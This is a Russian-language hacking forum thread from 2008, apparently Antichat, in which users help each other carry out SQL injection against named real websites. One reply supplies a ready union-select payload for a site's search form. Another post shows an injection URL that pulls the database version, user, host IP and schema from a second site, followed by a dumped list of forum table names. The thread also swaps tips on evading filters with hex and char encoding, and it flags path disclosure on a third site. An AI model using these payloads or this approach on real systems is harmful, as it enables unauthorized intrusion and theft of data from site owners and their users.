26.02.2008, 23:01
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
samarin
Это часный случай хитрых хохлов,а вообще переводи либо в Hex либо в char вот ссылка
_http://snak3.h17.ru/tools/
Scipio спасибо
|
|
|
26.02.2008, 23:11
|
|
Участник форума
Регистрация: 24.02.2008
Сообщений: 136
С нами:
9584577
Репутация:
69
|
|
ага понял... там блин = фильтруется надо like пользовать
Спасибо-Сам бы не разобрался
|
|
|
|
27.02.2008, 11:20
|
|
Познавший АНТИЧАТ
Регистрация: 27.04.2007
Сообщений: 1,044
С нами:
10021597
Репутация:
905
|
|
Возможно, это функция MySql ENCODE или AES_ENCRYPT
|
|
|
|
27.02.2008, 21:47
|
|
Новичок
Регистрация: 08.12.2007
Сообщений: 21
С нами:
9697759
Репутация:
36
|
|
Все кто может просветите вот в таком вопросе. Есть сайт
http://www.rusk.ru/search.php?action=news
Если в форму "поиск" ввести какую-нибудь ерунду, а на в конце поставить "кавычку", то вылетает ошибка:
SQL ERROR..... N1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'sdfd'') > 0))GROUP BY article.idar ORDER BY article.insdate DESC' at line 1
Интересует в обще-то следующее. Это на самом деле SQL? Можно ли из этого что-то "выжать"? А самое главное каков будет рабочий запрос? Ну то есть что надо ввести в поле формы или в УРЛ адрес, чтобы пробить инфу о базе и т.д? Правильно ли я понял, что запрос должен быть не совсем стандартный с использованием скобок? (в тексте описания ошибки они вроде как присутствуют, а где-то читал, что скобки должны быть закрыты в запросе).
Спасибо за возможный ответ.
|
|
|
|
27.02.2008, 22:10
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами:
10274726
Репутация:
1917
|
|
введи в поиске:
sd')>0)) union select 1,2,3,4,5--
незабудь пробел после --
__________________
Карфаген должен быть разрушен...
|
|
|
|
27.02.2008, 22:58
|
|
Новичок
Регистрация: 08.12.2007
Сообщений: 21
С нами:
9697759
Репутация:
36
|
|
Ух, спасибо, всегда приятно общаться с умным человеком, а то я уж всю голову сломал куда и чего вписать. Оно ж получается, что вся инфа-то в описании ошибки была, тока надо правильно ей пользоваться.
Ещё раз мерси.
|
|
|
|
27.02.2008, 23:43
|
|
Участник форума
Регистрация: 24.02.2008
Сообщений: 136
С нами:
9584577
Репутация:
69
|
|
Вчера уже обсуждалась тема по поводу information_schema.columns
cегодня та же проблема, только у меня не получилось ни чар ни лайк, может что-то неправильно делал-объясните пожалуйста!
---------------------------------------------------------
http://www.svetotehnika.dn.ua/templates/svet/index.php?id=181&show=news&newid=-8459+union+select+1,concat_ws(0x3a,version(),user( ),database()),3/*
5.0.32-Debian_7etch1-log:firstline_base@77.221.130.10:firstline_base
TRIGGERS
2103_forum_auth_access
2103_forum_banlist
2103_forum_categories
2103_forum_config
2103_forum_confirm
2103_forum_disallow
2103_forum_forum_prune
2103_forum_forums
2103_forum_groups
2103_forum_posts
2103_forum_privmsgs
2103_forum_privmsgs_text
2103_forum_ranks
2103_forum_sessions_keys
2103_forum_user_group
2103_forum_users
|
|
|
|
27.02.2008, 23:49
|
|
Познающий
Регистрация: 26.01.2008
Сообщений: 71
С нами:
9626078
Репутация:
141
|
|
не впревый раз натыкаюсь на такое
http://louisianaforward.com/view-release.aspx?id=3502'
собственно подскажите что енто такое и можно ли его использовать ?  |
|
|
|
28.02.2008, 00:43
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами:
10274726
Репутация:
1917
|
|
Сообщение от MaSter GeN
не впревый раз натыкаюсь на такое
http://louisianaforward.com/view-release.aspx?id=3502'
собственно подскажите что енто такое и можно ли его использовать ? это ошибка скрипта а не БД, ипользовать можно, как раскрытие путей
__________________
Карфаген должен быть разрушен...
|
|
|
|
28.02.2008, 01:01
|
|
Познающий
Регистрация: 26.01.2008
Сообщений: 71
С нами:
9626078
Репутация:
141
|
|
2Scipio спасиб
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
